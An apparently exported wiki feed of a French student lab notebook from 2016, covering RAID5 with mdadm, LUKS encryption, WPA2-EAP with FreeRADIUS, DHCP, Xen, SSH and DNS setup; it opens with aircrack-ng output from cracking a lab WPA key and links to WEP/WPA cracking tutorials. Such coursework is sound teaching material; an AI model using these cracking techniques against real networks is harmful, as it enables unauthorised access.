                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement.&lt;br /&gt;
[[Fichier:Connexioniphone.JPG|thumb|center|Connexion via smartphone]]&lt;br /&gt;
&lt;br /&gt;
==== Configuration et utilisation du PCBX ====&lt;br /&gt;
&lt;br /&gt;
== Références ==&lt;br /&gt;
&lt;br /&gt;
* Crackage de la clef WEP : [http://wiki.backtrack-fr.net/index.php/Casser_une_cl%C3%A9_wep/wpa_avec_la_suite_Aircrack-ng]&lt;br /&gt;
* Cassage de mot de passe WPA-PSK : [http://www.crack-wifi.com/tutoriel-crack-wpa.php]&lt;br /&gt;
* Cryptage de données : [https://doc.ubuntu-fr.org/cryptsetup]&lt;br /&gt;
* DHCP : [https://doc.ubuntu-fr.org/isc-dhcp-server]&lt;br /&gt;
* Asterisk : [http://denisrosenkranz.com/tuto-installer-et-configurer-asterisk-sous-debian-6-et-ubuntu/]&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35980</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35980"/>
				<updated>2016-12-13T08:56:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Serveur DCHP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
